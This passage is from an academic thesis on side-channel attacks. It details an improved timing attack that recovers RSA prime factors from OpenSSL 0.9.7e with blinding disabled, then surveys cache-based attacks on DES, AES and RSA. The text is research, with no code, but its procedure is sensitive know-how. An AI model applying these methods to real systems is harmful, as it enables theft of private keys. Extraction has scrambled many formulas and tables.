fraction of both neighborhood values usually yields the correct decision with high
probability. We can apply a particular decision rule not to sums of timings (i.e.,
to ∆) but successively to individual timing differences
∆j = Time (h + j)(R05)−1 (mod n) −
Time (hhi + j)(R05)−1 (mod n)
(3.6)
for j = 0, 1, . . . , Nmax . The attacker proceeds until the difference
#{j | qei;j = 0} − #{j | qej;i = 1} ∈ {m1 , m2 },
(3.7)
or a given maximum neighborhood size Nmax is reached. The term qei;j denotes j th
individual decision for qi , and the numbers m1 < 0 and m2 > 0 are chosen with
regard to the concrete decision rule. If the process ends at m1 (resp. at m2 ) the
attacker assumes that qi = 1 (resp. that qi = 0) is true. If the process terminates
because the maximum neighborhood size has been exceeded the attacker’s decision
depends on the difference at that time and on the concrete individual decision rule
(cf. [36], Chap. XIV, and [85], Sect. 7).
The fact that the distribution of the differences varies in the course of the
attack causes another difficulty. As pointed out earlier we do not assume that
the attacker has full knowledge on the implementation details and hence not full
control on the changes of the distribution. A possible individual decision rule
could be, for instance, whether the absolute value of an individual time difference
exceeds a particular bound thi (→ decision qei;j = 0). The attacker updates this
threshold value whenever he assumes that a current bit qi equals 1. The new
threshold value depends on the old one and the actual normalized value |∆|/Ne
where Ne denotes the number of exploited individual timing differences.
43
We use an alternative decision strategy that is closely related to this approach. For k ∈ {0, 1}, we define
fi;≥;k = Pr(∆j ≥ 0 | qi = k),
(3.8)
fi;<;k = Pr(∆j < 0 | qi = k).
(3.9)
and similarly
We want to mention that the following equation surely holds due to the reasons
given above.
max{fi;≥;0 , fi;<;0 } > max{fi;≥,1 , fi;<,1 }.
(3.10)
The right-hand maximum should be close to 0.5. We subtract the number of
negative timing differences from the number of non-negative ones. The process
terminates when this difference equals m1 = −D or m2 = +D > 0, or until a
particular maximum neighborhood size Nmax is reached. For Nmax = ∞, the
process will always terminate at either −D or D. However, the average number of
steps should be smaller when qi = 0, because of the fact highlighted in equation
(3.10). Consequently, if D and Nmax are chosen properly, a termination at D or
−D is a strong indicator for qi = 0, whereas reaching Nmax without termination
points that qi = 1. We use this strategy in our implementation and the results are
presented in §7. We interpret our decision procedure as a classical gambler’s ruin
problem. Formula (3.11) below facilitates the selection of suitable parameters D
and Nmax . If fi;≥;k 6= 0.5 formula (3.4) in [36] (Chap. XIV Sect. 3 with z = D,
a = 2D, p = fi;≥;k and q = 1 − p) yields the average number of steps (i.e., number
of time differences to evaluate) until the process terminates at −D or D assuming
Nmax = ∞. In fact,
f
1 − ( fi;<;k
)D
2D
D
i;≥;k
−
E(Steps) =
fi;<;k − fi;≥;k fi;<;k − fi;≥;k 1 − ( fi;<;k )2D
fi;≥;k
(3.11)
44
Similarly, formula (3.5) in [36] yields
E(Steps) = D2 if fi;≥;k = 0.5.
(3.12)
These formulae can be used to choose the parameter D and Nmax . A deeper
analysis of the gambler’s ruin problem can be found in [36], Sect. XIV.
The probabilities fi;≥;k vary with i and this fact makes the situation more
complicated. On the other hand, if D and Nmax are chosen appropriately, the
decision procedure should be robust against small changes of these probabilities.
3.4. Implementation Details
We performed our attack against OpenSSL version 0.9.7e with disabled
blinding, which would prevent the attack [71]. We implemented a simple TCP
server and a client program, which exchange ASCII strings during the attack. The
server reads the strings sent by the client, converts them to OpenSSL’s internal
representation, and sends a response after decrypting them. The attack is actually
performed by the client, which calculates the values to be decrypted, prepares and
sends the messages, and makes guesses based on the time spent between sending
a message and receiving the response.
We used GNU Multi Precision arithmetic library, shortly GMP, to compute
√
√
the square roots, i.e., b gc and b ghi c [40]. The source code was compiled using
the gcc compiler with default optimizations. All of the experiments were run
under the configuration shown in Table 3.1. We used random keys generated by
OpenSSL’s key generation routine. We measured the time in terms of clock cycles
using the Pentium cycle counter, which gives a resolution of 3.06 billion cycles
per second. We used the “rdtsc” instruction available in Pentium processors
to read the cycle counter and the “cpuid” instruction to serialize the processor.
45
Operating System:
RedHat workstation 3
CPU:
dual 3.06Ghz Xeon
Compiler:
gcc version 3.2.3
Cryptographic Library: OpenSSL 0.9.7e
TABLE 3.1. The configuration used in the experiments
Serialization of the processor was employed for the prevention of out-of-order
execution in order to obtain more reliable timings. Serialization was also used by
Brumley and Boneh in their experiments [21].
There are 2 parameters that determine the total number of queries required
to expose a single bit of q.
• Neighborhood size Nmax : We measure the decryption time in the neighborhoods of N (h; Nmax ) = {h, h+1, . . ., h+Nmax −1} and N (hhi ; Nmax ) = {hhi ,
hhi + 1, . . ., hhi + Nmax − 1} for each bit of q we want to expose.
• Target difference D: The difference between the number of time differences
that are less than zero and the number of time differences that are larger
then zero. If we reach this difference among Nmax many timings, we guess
the value of the bit as 0. Otherwise, our guess becomes as qi = 1.
The total number of queries and the probability of an error for a single
guess depend on these parameters. The sample size used by [21] is no longer a
parameter in our attack. In the following section, we present the results of the
experiments that explore the optimal values for these parameters.
In our attack, we try to expose all of the bits of q between 5th and 245th
bits. The first few bits are assumed to be able to determined by the same way as
46
new attack
BB-Attack
|∆|/N
∆BB /N
interval bits = 0 bits = 1 0-1 gap bits = 0 bits = 1 0-1 gap
[5, 31]
5871
3744
2127
3423
2593
830
[32, 63]
42778
4003
38775
15146
3455
11691
[64, 95]
40572
4310
36263
15899
3272
12627
[96, 127]
41307
3995
37313
18886
3580
15306
[128, 159]
45168
2736
42431
20877
2933
17945
[160, 191]
44736
3082
41654
24513
2479
22034
[192, 223]
37141
1755
35385
21550
1977
19573
[224, 245]
21936
2565
19371
27702
4728
22974
TABLE 3.2. Average ∆ and ∆BB values and 0-1 gaps. The values are given in
terms of clock cycles.
47
in [21]. The remaining 11 bits after 245th bit can be easily found by using either
an exhaustive search or BB-attack itself.
3.5. Experimental Results
In this section we present the results of our experiments in four subsections.
First, we compare our attack to BB-attack. Then, we give the details of our
attack including error probability, parameters and the success rate in the following
subsections. We also show the distribution of the time differences, which is the
base point of our decision strategy.
The characteristics of the decryption time may vary during the course of
the attack, especially around the multiples of the machine word size. Therefore,
we separated the bits of q into different groups, which we call intervals. The
interval [i,j] represents all the bits between ith and j th bit, inclusively. In our
experiments, we used intervals of 32 bits: [32,63], [64, 95], ...etc.
All of the results we present in this paper were obtained by running our
attack as an inter-process attack. It is stated in [21] that it is sufficient to increase
the sample size to convert an inter-process attack into an inter-network attack. In
our case, either a sample size can be used as a third parameter or the neighborhood
size and the target difference can be adjusted to tolerate the network noise.
3.5.1. Comparison of our attack and BB-attack
In [21], Brumley and Boneh calculated the time differences, denoted by
∆BB , for each bit to use as an indicator for the value of the bit. The gap between
∆BB when qi is 0 and when it is 1 is called the zero-one gap in [21]. Therefore, we
want to compare both attacks in terms of zero-one gap. We run both attacks on
48
10 different randomly chosen keys and collected the time differences for each bit in
[5, 245] using a neighborhood size of 5000 and a sample size of 1. Table 3.2 shows
the average statistics of the collected values. The zero-one gap is 114% larger in
our attack, which means a smaller number of queries are required to deduce a key
in ours.
3.5.2. The details of our attack
Our decision strategy for each single bit consists of:
• Step 1: Sending the query for a particular neighbor and measuring the time
difference ∆j .
• Step 2: Comparing ∆j with zero and updating difference between the number of ∆j values that are less than zero and the number of ∆j values that
are larger than zero.
• Step 3: Repeating first 2 steps until we reach the target difference, D, or a
maximum of Nmax times.
• Step 4: Making the guess qi = 0, if the target difference is reached. Otherwise the guess turns out to be qi = 1.
Note that we normally send only one query in Step 1, although we use
a difference of two timings in our decision. This is because one of the timings
we use to compute the difference has to be the one used for the decision of the
previous bit. Since we halve the interval, which q is in, in each decision step,
only one of the bounds, either the upper or lower one, will change. The timings
for the bound that does not change can be reused during the decision process
49
.
FIGURE 3.2. The distribution of ∆j in terms of clock cycles for 0 ≤ j ≤ 5000,
sorted in descending order, for the sample bit q61 . The graph on the left shows
this distribution when q61 = 1. The distribution on the right is observed when
q61 = 0.
of the next bit. Therefore sending one query for a particular neighbor becomes
sufficient by storing the data of the previous iteration. Of course, there are some
cases that we have to send both queries, specifically when we exceed the total
number of neighbors used in the previous decision step. However, just removing
the redundant queries, which can also simply be applied to BB-attack, almost
doubles the performance.
3.5.2.1. The distribution of time differences
We use the distribution of the time differences for our decision purposes.
Whenever qi = 1, the number of time differences lay above and below zero is very
close to each other. However, when qi = 0, the difference between these numbers
becomes larger(see Figure 3.2).
50
interval max{fi;≥;0 , fi;<;0 } max{fi;≥,1 , fi;<,1 }
[5, 31]
0.5315
0.5040
[32, 63]
0.6980
0.5097
[64, 95]
0.7123
0.5085
[96, 127]
0.7079
0.5079
[128, 159]
0.7300
0.5080
[160, 191]
0.7349
0.5090
[192, 223]
0.6961
0.5077
[224, 245]
0.6431
0.5194
TABLE 3.3. The percentage of the majority of time differences that are either
positive or negative (empirical values)
3.5.2.2. Error probabilities and the parameters
When qi = 1, approximately half of the time differences become positive
and the other half become negative. If qi is 0, the majority of the time differences becomes either positive or negative. We determined the percentage of that
majority in order to calculate the error probability for a single time difference.
Table 3.3 shows estimators for max{fi;≥;0 , fi;<;0 } and max{fi;≥,1 , fi;<,1 }. These
statistics were obtained using 10 different keys and a neighborhood size of 50000
for [5, 31] and 5000 for other intervals.
The empirical parameters that yield the intended error probabilities are
shown in Table 3.4. We present three different sets of parameters for each accuracy
of 95%, 97.5%, and 99%. We used these parameters to perform our attack on
several different keys. Note that inserting the values of Table 3.3 into formula
51
(3.11) yields the expected values E(Steps) for qi = 0 and qi = 1, resp. The
probabilities for correct guesses (95%, 97.5%, 99%) were gained empirically.
We employed the concept of ‘confirmed intervals’ (refer to Section 3.1) to
detect the errors occured during the attack. We could recover such errors using
the same concept and could expose each bit of q in the interval [5, 245] of any key
we attacked. Brumley and Boneh used 1.4 million queries in [21] (interprocess
attacks) and they indicated that their attack required nearly 359000 queries in
the more favourable case when the optimizations were turned off by the flag (g). We could perform our attack with as low as 47674 queries for a particular
key. The performance of these timing attacks are highly environment dependent,
therefore it is not reliable to compare the figures of two different attacks on two
different systems. Despite this fact, it is obvious by the arguments explained above
(improving the signal-to-noise ratio (cf. also Table 3.2), reusing previous queries,
sequential sampling) that our attack is significantly better than the previous one.
We performed interprocess attacks. Clearly, in network attacks the noise
(caused by network delay times) may be much larger, and hence an attack may
become impractical even if it is feasible for an interprocess attack under the same
environmental conditions. However, this aspect is not specific for our improved
variant but a general feature that affects BB-attack as well.
3.6. Conclusion
We have presented a new timing attack against unprotected SSL implementations of RSA-CRT. Our attack exploits the timing behavior of Montgomery
multiplications performed during table initialization phase of the sliding window
exponentiation algorithm. It is an improvement of Brumley and Boneh attack,
52
Accuracy = 95%
Accuracy = 97.5%
Accuracy = 99%
parameters E(Steps) for parameters E(Steps) for parameters E(Steps) for
interval D
Nmax qi = 0 qi = 1 D
Nmax qi = 0 qi = 1 D
Nmax qi = 0 qi = 1
[5, 31] 63
1850
1975 1077 4220 230
6720 3646 27480
[32, 63] 25
131
63
579 29
163
73
761 34
240
85 1012
[64, 95] 17
67
40
281 36
192
84 1154 46
450
108 1767
[96, 127] 18
70
43
315 26
130
62
640 44
250
105 1674
[128, 159] 16
50
34
250 31
271
67
889 41
299
89 1477
[160, 191] 21
107
44
421 25
127
53
585 29
169
61
[192, 223] 24
126
61
551 36
264
91 1179 49
333
124 2033
[224, 245] 30
230
104
636 31
259
365
150 1032
998 3667 68
108
667 43
TABLE 3.4. Columns 2 and 3 show the parameters that can be used to yield
the intended accuracy. The last columns give the expected number of steps for
Nmax = ∞, calculated using Formula (3.11), to reach the target difference D.
771
53
which exploits Montgomery multiplication in the exponentiation phase of the
same algorithm. Changing the target phase of the attack yields an increase on
the number of multiplications that provide useful information to expose one of
the prime factors of RSA moduli. Only this change alone gives an improvement
by a factor of more than 5 over BB-attack.
We have also presented other possible improvements, including employing
sequential analysis for the decision purposes and removing the redundant queries
that can also be applied to BB-attack. If we use only the idea of removing redundant queries from BB-attack, this will double the performance by itself. Our
attack brings an overall improvement by a factor of more than 10.
54
4. SURVEY ON CACHE ATTACKS
As we mention earlier in this document, traditional cryptography considers
cryptosystems as perfect mathematical models and deals only with these models.
However, any cryptosystem needs an implementation and a physical device to
run on. The implementations of cryptosystems may leak information through
so-called side channels due to the physical requirements of the device, e.g., power
consumption, electromagnetic emanation and/or execution time. In this chapter,
we focus on a specific type of side-channel attacks that takes advantage of the
information which leaks through the cache architecture of a CPU. To be more
precise, we describe cache-based attacks in the literature.
Timing attacks on various cryptosystems, including RSA and DiffieHellman, were introduced in 1996 by Kocher [59]. Several papers have been
published on the subject since then, e.g., [34, 85, 21, 6]. In 1999, Koeune and
Quisquater developed a timing attack on a careless implementation of AES [61],
which has significantly been improved in [88]. A timing attack against RSA on a
smart card was developed in [34]. Various timing attacks were significantly improved or discovered by employing formal statistical models and efficient decision
strategies in [85, 6, 88, 87, 89, 86].
All of the timing attacks mentioned above exploit the variations in execution time caused by running different execution paths due to the conditional
branches, e.g., due to the extra reduction step of Montgomery Multiplication (c.f.
Sections 2.1.3, 3.1, 3.2, and 3.3). However, it is still possible to attack an implementation even if the execution path is always same. A cache-based attack,
abbreviated to “cache attack” from here on, exploits the cache behavior of a cryp-
55
tosystem by obtaining the execution time and/or power consumption variations
generated via cache hits and misses.
The feasibility of the cache attacks was first mentioned by Kocher and
then Kelsey et al. in [59, 54]. Page described and simulated a theoretical cache
attack on DES [75]. The first actual cache attacks were implemented by Tsunoo
et al. [101, 100]. The main focus of those papers was on DES [20]. Tsunoo et al.
claimed that the search space of the AES key could be narrowed to 32 bits using
cache attacks; however they did not detail their attack.
Bernstein showed the vulnerability of AES by performing a cache attack on
OpenSSL AES implementation [14]. The attack he developed is a template attack
[24] and requires prior knowledge of the timing behavior of the cipher under the
same known key on an identical platform. In this sense, his attack is not very
practical, because the required information is not directly available to an attacker.
Efficient cache attacks on AES were presented by Osvik et al. in [72, 73].
They described and simulated several different methods to perform local cache
attacks. They made use of a local array, and exploited the collisions between AES
table lookups and the accesses to this array. None of their methods can be used
as a remote attack, e.g., an attack over a local network, unless the attacker is able
to manipulate the cache remotely.
None of the mentioned papers, except [14], considered whether a remote
cache attack is feasible. Although Bernstein claimed that his attack revealed the
key of a remote cryptosystem, his experiments were purely local [14]. The server
received the messages, processed them and sent the exact execution time to the
attacker client in his attack model. Therefore, there were neither transmission
delays nor network stack delays in the measurements.
56
Despite of Bleichenbacher’s attack ( [16]), which exploited weak implementations of the SSL handshake protocol, the vulnerability of software systems
against remote timing attacks was not known until Brumley and Boneh performed
an attack over a local network in ( [21]). They mimicked the attack introduced
in [85] to show that the RSA implementation of OpenSSL [71], which is the most
widely used open-source crypto library, was not immune to such attacks at that
time. An improved version of this attack is introduced in [6] and also given in
Section 3.3.
In this chapter, we give more details of the cache attacks mentioned above.
4.1. The Basics of a Cache Attack
A cache is a small and fast storage area used by the CPU to reduce the
average time to access main memory (c.f. Section 2.3.1). Cryptosystems have
data-dependent memory access patterns. Cache architectures leak information
about the cache hit/miss statistics of ciphers through side channels, e.g., execution
time and power consumption. Therefore, it is possible to exploit cache behavior
of a cipher to obtain information about its memory access patterns, i.e. indices
of S-box and table lookups.
Cache attacks rely on the cache hits and misses that occur during the
encryption / decryption process of the cryptosystem. Even if the same instructions
are executed for any particular (plaintext, cipherkey) pair, the cache behavior
during the execution may cause variations in the program execution time and
power consumption. Cache attacks try to exploit such variations to narrow the
exhaustive search space of secret keys.
57
Theoretical cache attacks were first described by Page in [75]. Page characterized two types of cache attacks, namely trace-driven and time-driven. In
trace-driven attacks, the adversary is able to obtain a profile of the cache activity of the cipher. This profile includes the outcomes of every memory access the
cipher issues in terms of cache hits and misses. Therefore, the adversary has the
ability to observe (e.g.) if the 2nd access to a lookup table yields a hit and can
infer information about the lookup indices, which are key dependent. This ability
gives an adversary the opportunity to make inferences about the secret key.
Time driven attacks, on the other hand, are less restrictive since they
do not rely on the ability of capturing the outcomes of individual memory accesses. Adversary is assumed to be able to observe the aggregate profile, i.e., total
numbers of cache hits and misses or at least a value that can be used to approximate these numbers. For example, the total execution time of the cipher can
be measured and used to make inferences about the number of cache misses in a
time-driven cache attack. Time-driven attacks are based on statistical inferences,
and therefore require much higher number of samples than trace-driven attacks.
We have recently seen another type of cache attacks that can be named as
“access-driven” attacks. In these attacks, the adversary can determine the cache
sets that the cipher process modifies. Therefore, he can understand which elements
of the lookup tables or S-boxes are accessed by the cipher. Then, the candidate
keys that cause an access to unaccessed parts of the tables can be eliminated.
In the rest of this section, we present the basic models of cache attacks.
The attacks in the literature are built upon these models.
58
.
FIGURE 4.1. Cache Attack Model-1
4.1.1. Basic Attack Models
In this subsection we present two different models that are employed in
various cache attacks in the literature. The first model mainly corresponds to
access-driven cache attacks, while the second model is the basic model of timedriven and trace-driven attacks.
4.1.1.1. Model-1
We use Figure 4.1 to explain this attack model. We have a main memory
that stores data of each process running on the system and a cache between the
memory and the CPU. Each square in the cache represents a cache block and each
column represents a different cache set. For example, this cache has 2 blocks in
each column, so it is 2-way set associative. The blocks in a column of the memory
map only to the corresponding cache set in the same column of the cache. Mapping
a memory block to a cache set means that this particular cache block can only
be stored in that set of the cache. As an example, the garbage data and data
structure 1 can only be in the dark area of the cache in Figure 4.1.
59
Assume that we have two different processes, the cryptosystem and a malicious process, called Spy process, running on the same machine. Cryptosystem
process contains different internal data structures and it accesses some or all of
these data structures, depending on the value of the secret key. The adversary
can easily understand if the cipher has at least one access to data structure 1 during an encryption, because accesses to garbage data and data structure 1 creates
external collisions.
A collision is the situation that occurs when an attempt is made to store
two or more different data items at a location that can hold only one of them. We
use the term “external collision” if these data items belong to different processes.
On the other hand, if the data items are of the same process, we call this situation
as “internal collision”.
In our case, the cache cannot store the garbage data and data structure
1 at the same time, so an access to the garbage data may evict data structure 1
from the cache and vice versa. This fact enables an adversary to devise an attack
on the cryptosystem process as follows.
When the adversary reads the garbage data, CPU loads the content of it
into the cache (Figure 4.2a). If the cryptosystem is run under this initial cache
state, there are two possible cases:
1. Case: Data structure 1 is accessed by the cipher.
2. Case: Data structure 1 is not accessed by the cipher.
In Case 1 (Case 2, resp.) the final state of the first four cache sets just after
the encryption becomes like Figure 4.2b (Figure 4.2c, resp.). In the first case, the
cipher accesses data structure 1 and this access changes the content of the first four
cache sets as shown in the figure. Otherwise, these sets remain unchanged. When
60
.
FIGURE 4.2. Cache states
the adversary reads the garbage data again after the encryption, he can understand
which case was true, because reading the garbage data creates some cache misses
and thus takes longer in Case 1. Similarly, at least in theory, the adversary can
use the same technique for other data structures and reveal the entire set of items
that are accessed during an encryption. Since this set depends on the secret key
value, he can gain invaluable information to narrow the exhaustive search space.
This model describes an active attack where the adversary must be able to
control the content of the cache. The cache attacks rely on this basic model corresponds to access-driven types. Percival’s attack on RSA [80](c.f. Subsection 4.2.4),
OST and Neve et. al.’s attacks on AES [72, 73, 67] (c.f. Subsections 4.2.5 and
4.2.6) and the power attack by Bertoni et al. [15] (c.f. Subsection 4.2.7) use this
attack model.
61
4.1.1.2. Model-2
Assume there are two accesses to the same table as in Figure 4.3. Let
Pi and Ki be the ith byte of the plaintext and cipherkey, respectively. In this
paper, each byte is considered to be either an 8-digit radix-2 number, i.e., {0, 1}8 ,
that can be added together in GF(28 ) using a bitwise exclusive-or operation or
an integer in [0, 255] that can be used as an index. For the rest of this paper,
we assume that each plaintext consists of a single message block unless otherwise
stated. The size of the message block depends on the particular cryptosystem in
use, e.g. it is 128, 192, or 256 bits for AES, 64 bits for DES, and usually 512 or
1024 bits for RSA.
The structure shown in the figure uses different bytes of the plaintext and
the cipherkey as inputs to the function that computes the index of each of these
two accesses. If both of them access to the same element of the table, the latter
one will find the target data in the cache and result a cache hit; therefore requires
a shorter execution time. Then, the key byte difference K1 ⊕ K2 can be derived
from the values of plaintext bytes P1 and P2 using the equation:
P 1 ⊕ K1 = P 2 ⊕ K 2 ⇒ P 1 ⊕ P 2 = K1 ⊕ K2 .
In trace-driven attacks, we already assume that the adversary can directly
understand if the latter access results a hit, thus can directly obtain K1 ⊕ K2 .
This goal is more complicated in time-driven attacks. We need to use a
large sample to realize an accurate statistics of the execution. In our case, if we
collect a sample of different plaintext pairs with the corresponding execution time,
the plaintext byte difference, P1 ⊕ P2 , that causes the shortest average execution
62
.
FIGURE 4.3. Two different accesses to the same table.
time will give the correct key byte difference assuming a cache hit decreases the
overall execution time.
However, in a real environment, even if the latter access is to a different
element other than the exact target of the former access, a cache hit may still
occur. Any cache miss results the transfer of an entire cache line, not only one
element, from the main memory. Therefore, if the former access has a target,
which lies in the same cache line of the previously accessed data, a cache hit will
occur. In that case, we can still obtain the key byte difference partially as follows:
Let δ be the number of bytes in a cache line and assume that each element
of the table is k bytes long. Under this situation, there are δ/k elements in each
line, which means any access to a specific element will map to the same line with
(δ/k − 1) different other accesses. If two different accesses to the same array read
the same cache line, the most significant parts of their indices, i.e., all of the bits
except the last ` = log2 (δ/k) bits, must be identical.1 Using this fact, we can find
1 We
assume that lookup tables are aligned in the memory, which is the case most of
the time. If they are not aligned, this will indeed increase the performance of the attack
as mentioned in [73].
63
the difference of the most significant part of the key bytes using the equation:
hP1 i ⊕ hP2 i = hK1 i ⊕ hK2 i ,
where hAi stands for the most significant part of A.
Indices of table lookups are usually more complex functions of the plaintext and the cipherkey than only bitwise exclusive-or of their certain bytes. The
structure of these functions determines the performance of the attack, i.e., the
amount of reduction in the exhaustive search space. The basic idea presented
above can be adapted to any such function in order to develop successful attacks.
Let f1 (P, K 0 ) and f2 (P, K 00 ) be two different functions that specify the
indices of two different accesses to the same table, where K 0 and K 00 are certain
parts of the same cipherkey.
• If
hf1 (P, K 0 )i = hf2 (P, K 00 )i
(4.1)
for each plaintext in a large sample, then the expected timing characteristics
of this set, e.g., median or average execution time, will be different than that
of a random sample.
When we consider this fact, a simple attack method becomes the following:
1. Phase 1: Obtain a sample of N (plaintext, encryption time) pairs generated
under the same target key.
f0 and K
f00 stand
2. Phase 2: Perform an exhaustive search on K 0 and K 00 . Let K
for the candidate values of K 0 and K 00 , respectively. Divide the entity of all
(plaintext, encryption time) pairs into different sets, one for each candidate
f0 , K
f00 ), and put all plaintexts in this set that satisfy equation 4.1
pair (K
64
f0 , K
f00 ). Note that these sets need not be mutually disjoint, i.e., a
for (K
f0 , K
f00 ) values in
particular plaintext may obey equation 4.1 for different (K
which case it will be an element of all of these sets (one set for each different
f0 , K
f00 ) value).
(K
3. Phase 3: Obtain the timing characteristics of each set. If all of these characteristics, except one, is very similar to each other, the one with the different
f0 = K 0
characteristics has to be the set of the correct candidates, i.e., when K
f00 = K 00 .
and K
4.2. Cache Attacks in the Literature
In this section we summarize the cache attacks in the literature. Our
own attacks are only briefly mentioned in this chapter and described in the next
chapters in detail.
4.2.1. Theoretical Attack of D. Page
D. Page described and simulated a theoretical trace-driven cache attack on
DES [75]. We do not present the details of DES algorithm [20] in this document,
but we give the necessary information to understand the basic idea of this attack.
In DES, there are 16 rounds of computations and 8 different S-boxes. In
every round, there is an access to each of these 8 S-boxes as shown in Figure 4.4.
The indices used in first two rounds are given below:
I0 = K0 ⊕ E(R0 )
I1 = K1 ⊕ E(L0 ⊕ P (S(K0 ⊕ E(R0 )))) ,
65
.
FIGURE 4.4. DES S-Box lookup.
where E is the expansion function and P is the permutation function. These
functions are reversable (injective), i.e., given the output, the inputs of these
functions can be calculated. S is the function implemented in S-boxes. R0 and
L0 are the right and left halves of the input plaintext after the application of the
initial permutation. K0 and K1 are the round keys derived from the actual key,
K.
If the adversary can capture the profile of the cache activity during the
second round, i.e., the outcomes of S-box lookups using index I1 , then he can
correlate I0 and I1 . From this correlation, he can partially recover the bits of K0
and K1 , thus some bits of the actual key. The reader should notice that the values
of R0 and L0 are known by the adversary, i.e. it is a known or chosen plaintext
attack. More details of the attack can be found in the original paper [75].
This attack is hypothetical, because Page just assumed that it was possible to capture the cache profile and did not explain how. Later, Bertoni et
al. and Lauradoux showed that it was possible to capture the cache traces of a
cryptosystem using power analysis [15, 62], c.f. Sections 4.2.7 and 4.2.8.
Page’s attack requires capturing 210 encryption profiles to reduce the search
space from 256 bits to 232 bits. Page also discussed possible countermeasures
against cache attacks in [75, 76, 80].
66
4.2.2. First Practical Implementations
Cache attacks were first implemented by Tsunoo et al. [101, 100]. These
attacks are time-driven cache based timing attacks built upon the last attack
model described above. Tsunoo et al. developed different attacks on various
ciphers, including MISTY1 [101, 63], DES and Triple-DES [100, 20]. The original
attack on MISTY1 proposed in [101] is improved later in [102]. In this paper, we
only describe the attack on DES.
Their attack focuses on the indices of first and last round S-box lookups.
The adversary collects a sample of plaintext and the corresponding encryption
times and analyzes this data to find correlations between first and last round S-box
indices, considering each of 8 S-boxes, S0 through S7. From the correlations found,
he can make partial inferences about the secret key. Note that this attack employs
statistical inferences, and thus its success is probabilistic. Their experiments show
that collecting 223 known plaintext reduces the search space down to 224 bits with
a success rate of higher than 90%.
4.2.3. Bernstein’s Attack
Bernstein showed the vulnerability of AES by performing a cache attack
on OpenSSL’s AES implementation [14]. The attack he developed is a template
attack [24] and requires prior knowledge of the timing behavior of the cipher under
the same known key on an identical platform.
There are different phases of this attack. In the first phase, profiling or
learning phase, the attacker establishes the profiles of the execution time of the
cipher under known secret keys. To establish such profiles, it is necessary to know
the value of the test keys and simulate the execution of the cipher for a sample of
67
known plaintext on a platform exactly identical to the server. Even the software
installed on the target and test platforms need to be same [68, 66].
After establishing each profile, the attacker can apply the actual attack to
the server. He sends random plaintext to the server and measures the encryption
time of each plaintext. Doing so, he can establish the profile of the actual secret
key. Then he can find correlations of the actual profile and the profiles captured
during the profiling phase, each profile typical for a particular subkey. From these
correlation, he tries to predict the parts of the secret key or a set of candidate
keys. He can find the actual key using a brute-force attack on the narrowed search
space.
Bernstein showed the vulnerability of AES software implementations on
various platforms [14]. There was a common belief that Bernstein’s attack is a
realistic remote attack and it can recover an entire AES key. However, Neve et
al. showed in [68] that this is only a fallacy. They described the circumstances
in which the attack might work and also the limitations of the Bernstein attack.
The details of this analysis can also be found in [66].
4.2.4. Percival’s Hyper-Threading Attack on RSA
Colin Percival developed a noteworthy cache attack on OpenSSL’s implementation of RSA [82], which is the most widely used public-key cryptosystem.
This attack is built upon the first attack model presented above (cf. Subsection 4.1.1.1).
In Subsection 4.1.1.1, we describe a general attack model that can work
in almost any environment. But, such attacks become very powerful especially
on simultaneous multithreading environments, because the adversary can run the
68
malicious process, i.e., Spy process, simultaneously with the cipher. Running
these processes simultaneously allows an attacker to obtain not only the set of
data structures accessed by the cipher but also the approximate time that each
access occurs.
In Percival’s attack, we run a spy process simultaneously with the server.
This process continuously reads each cache set in the same order and measures
the read time of each of these cache sets as long as the cipher process operates.
If reading a cache set takes longer, the attacker can conclude that this set was
accessed during the time interval between the last read of the set by the spy
process and the current read. In this sense, it is a combined trace-driven and
access-driven cache attack.
This attack reveals the ‘footprints’ of a process, i.e., the steps that this process follows. In case of RSA, Percival was able to identify the order of squaring
and multiplication operations in OpenSSL’s implementation that employs sliding
windows exponentiation with a window size of 5 bits. The known sequence of
these operations gives 200 bits of information about each of the two 512-bit secret
exponents. If it is also possible to distinguish each multiplier, based on the cache
sets they map to, then the adversary can directly obtain the value of both exponents. The same attack can straightforwardly recover the exponents, if square
and multiply exponentiation is used in the implementation.
4.2.5. Osvik-Shamir-Tromer (OST) Attacks
Osvik, Shamir, and Tromer used a similar idea to attack AES [73]. They
described and simulated several different methods to perform local cache attacks.
They make use of a local array and exploit the collisions between AES table
69
lookups and the accesses to this array. None of their methods can be used as a
remote attack, e.g. an attack over a local network, unless the attacker is able to
manipulate the cache remotely.
In their attack model, the adversary reads the garbage data to load it into
the cache, waits for someone else to start encryption, and after the encryption
he reads the garbage data again to find the cache sets accessed by AES process.
Clearly, this attack is very similar to the model in Subsection 4.1.1.1 and it is an
access-driven attack.
In OST attack, the adversary analyzes the cache sets that are accessed
during the first two rounds of AES and predicts the table lookup indices. Then, he
recovers the key with the knowledge of these indices. This attack is very efficient
and requires only 300 encryptions on AMD Athlon and 16000 encryptions on
Pentium 4.
4.2.6. Last Round Access-Driven Attack
Osvik et al.’s access-driven attack considers the access of the first two AES
rounds. Neve et al. improved this attack by taking the last round accesses into
consideration.
The most widely used AES implementation employs a single lookup table,
called T4, for the last round computations (c.f. Section 2.2.2). The adversary
completely evicts T4 from the cache by reading a local array before an AES
computation as done in [73] (c.f. Sections 4.2.5 and 4.1.1.1). After the AES
execution, he determines which data blocks of T4 are accessed by the cipher.
Then he eliminates the values that cannot be the correct value of the last round
key bytes with the knowledge of unaccessed data blocks and the ciphertext value.
70
The adversary continues to apply this elimination method by collecting data from
other AES executions until he finds the correct round key.
This attack is calculated to require less than 13 encryptions in average in
a ideal environment to break AES on the systems that have a cache line size of
64 bytes.
4.2.7. Cache-based Power Attack on AES from Bertoni et al.
Bertoni et al. devised a cache based power attack on AES that can theoretically break the cipher with 512 encryptions [15]. They realized that cache misses
are easily observable through power analysis at least in a simulation environment.
In this attack, the adversary is assumed to know the exact location of AES
Sbox, the exact implementation, and the details of the cache architecture, i.e.,
cache size, block size, and associativity. He first triggers the AES computation to
load Sbox into the cache. Then, he evicts a particular Sbox entry from the cache
and runs AES again, but this time he also measures the power consumption of
the execution. If AES accesses to this particular entry during the computation,
the adversary can detect if and when it happens. Therefore, he can understand
which Sbox lookup causes an access to that particular entry. Performing the same
method with each Sbox entry allows the adversary to determine the indices of the
AES lookups.
Bertoni et al.
tested their attack in a simulation environment using
Simplescalar-3.0 toolset [11, 22] and Power Analyzer [55], a library for power
modelling that can be integrated in Simplescalar. We want to mention that their
attack is theoretical because they did not consider the details of practical issues
that arouse in an actual attack.
71
4.2.8. Lauradoux’s Power Attack on AES
Another cache power attack is from Lauradoux [62]. He presented a cache
attack on AES, which exploits the internal cache collision instead of the external
collisions that were used in Bertoni et al.’s attack. This attack analyzes the power
consumption of the AES execution to detect the occurences of internal collisions
during the first AES round. This knowledge allows an adversary to reveal the
values of certain key byte differences and immediately reduces the exhaustive
